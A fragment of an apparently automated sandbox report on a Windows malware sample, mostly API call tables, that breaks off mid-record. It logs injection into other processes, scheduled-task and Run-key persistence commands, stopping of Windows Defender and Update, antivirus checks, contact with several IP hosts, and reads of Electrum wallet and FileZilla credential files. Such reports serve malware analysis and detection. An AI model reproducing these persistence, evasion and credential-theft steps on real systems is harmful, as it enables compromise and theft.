          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          ENTERPRISE
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000588
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          Fontcore
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000594
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          Google Chrome
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000594
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          Haansoft HWord 80 Korean
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          IE40
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
RegOpenKeyExW

  
  
    
      
    
  


  
    
      regkey_r:
      
        
          IE4Data
        
      
      
      

    
  
    
      base_handle:
      
        
          0x00000580
        
      
      
      

    
  
    
      key_handle:
      
        
          0x00000598
        
      
      
      

    
  
    
      options:
      
        
          0
        
      
      
      

    
  
    
      access:
      
        
          0x00020019
        
      
      
      

    
  
    
      regkey:
      
        
          HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3012
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          604
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2856
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          1308
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          1156
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          884
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          884
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2932
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2932
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2568
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          2568
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3116
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3116
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3124
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3124
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3188
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtTerminateProcess

  
  
    
      
    
  


  
    
      status_code:
      
        
          0xffffffff
        
      
      
      

    
  
    
      process_identifier:
      
        
          3188
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000058c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    cmdline
                                    SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks  /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:3012 CREDAT:145409
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    chcp  1251
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_Processor
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    buffer
                                    Buffer with sha1: 64511468652f7e0aae2b13d653c159011fa2ec6a
                                    
                                


                            

                        

                            

                                

                                    buffer
                                    Buffer with sha1: 2441a44b06509975255deafbaa7fd57a83a0bd41
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                            host
                                            109.107.182.3
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            117.18.232.200
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            141.95.211.148
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            185.172.128.19
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            185.172.128.90
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            185.215.113.68
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            193.233.132.62
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            195.20.16.103
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            5.42.64.33
                                        
                                    
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                            host
                                            80.79.4.61
                                        
                                    
                                        
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtProtectVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          2964
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      length:
      
        
          4096
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57000
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtAllocateVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          4192
        
      
      
      

    
  
    
      region_size:
      
        
          532480
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      allocation_type:
      
        
          12288
        
      
      
        (MEM_COMMIT|MEM_RESERVE)
      
      

    
  
    
      process_handle:
      
        
          0x0000029c
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
NtAllocateVirtualMemory

  
  
    
      
    
  


  
    
      process_identifier:
      
        
          5088
        
      
      
      

    
  
    
      region_size:
      
        
          335872
        
      
      
      

    
  
    
      stack_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      stack_pivoted:
      
        
          0
        
      
      
      

    
  
    
      heap_dep_bypass:
      
        
          0
        
      
      
      

    
  
    
      protection:
      
        
          64
        
      
      
        (PAGE_EXECUTE_READWRITE)
      
      

    
  
    
      base_address:
      
        
          0x00400000
        
      
      
      

    
  
    
      allocation_type:
      
        
          12288
        
      
      
        (MEM_COMMIT|MEM_RESERVE)
      
      

    
  
    
      process_handle:
      
        
          0x00000228
        
      
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\ProgramData\AVAST Software
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\Avira
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\Kaspersky Lab
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\Panda Security
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\Bitdefender
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\AVG
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\ProgramData\Doctor Web
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
ControlService

  
  
    
      
    
  


  
    
      service_handle:
      
        
          0x005cbf20
        
      
      
      

    
  
    
      service_name:
      
        
          WinDefend
        
      
      
      

    
  
    
      control_code:
      
        
          1
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
ControlService

  
  
    
      
    
  


  
    
      service_handle:
      
        
          0x005cc2e0
        
      
      
      

    
  
    
      service_name:
      
        
          wuauserv
        
      
      
      

    
  
    
      control_code:
      
        
          1
        
      
      
      

    
  


    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
NtQuerySystemInformation

  
  
    
      
    
  


  
    
      information_class:
      
        
          8
        
      
      
        (SystemProcessorPerformanceInformation)
      
      

    
  


    
        1
    

0

    
        0
    


                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    registry
                                    HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    
                                        
                                    
                                        
                                            reg_key
                                            HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131
                                        
                                    
                                        
                                            reg_value
                                            C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
                                        
                                    
                                


                            

                        

                            

                                

                                    
                                        
                                    
                                        
                                            reg_key
                                            HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\stan.exe
                                        
                                    
                                        
                                            reg_value
                                            C:\Users\test22\AppData\Local\Temp\1000574001\stan.exe
                                        
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks  /create /tn "MalayamaraUpdate" /tr "'C:\Users\test22\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
                                    
                                


                            

                        

                            

                                

                                    cmdline
                                    schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\Electrum\wallets
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    registry
                                    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
                                    
                                


                            

                        

                            

                                

                                    file
                                    C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    wmi
                                    SELECT * FROM AntivirusProduct
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_OperatingSystem
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_Process Where SessionId='1'
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_Process
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM AntiSpyWareProduct
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM FirewallProduct
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_DiskDrive
                                    
                                


                            

                        

                            

                                

                                    wmi
                                    SELECT * FROM Win32_Processor
                                    
                                


                            

                        

                    


                    

                

            
            
        
            


                

                
                

                    

                    

                        
                        

                            

                                

                                    

                                    
                                        

                                            Time & API
                                            Arguments
                                            Status
                                            Return
                                            Repeated
                                        

                                    

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2b22b0
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d88
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»`#(?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d81590
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          l 
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          I»  (?Aÿã
        
      
      
      

    
  
    
      base_address:
      
        
          0x0000000076d57a90
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x0000000000000050
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          l 
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0d70
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          ϝT
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f260108
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          Øv@Øv Øv@ØvØv°Øv €ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀ‚ÖvöÔv YØv2ØvVØv°Þv€“Õv€RØv ›ÕvQØvÂÕv ?ÖvP€Õv°TÕvàtÕvð„ÖvÐ1Øv™ÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2baae8
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2c0c78
        
      
      
      

    
  
    
      process_identifier:
      
        
          2980
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
          0x000000013f2b22b0
        
      
      
      

    
  
    
      process_identifier:
      
        
          2580
        
      
      
      

    
  
    
      process_handle:
      
        
          0x000000000000004c
        
      
      
      

    
  


    
        1
    

1

    
        0
    


                                


                            

                        

                            

                                

                                

                                    

  
WriteProcessMemory

  
  
    
      
    
  


  
    
      buffer:
      
        
          
        
      
      
      

    
  
    
      base_address:
      
        
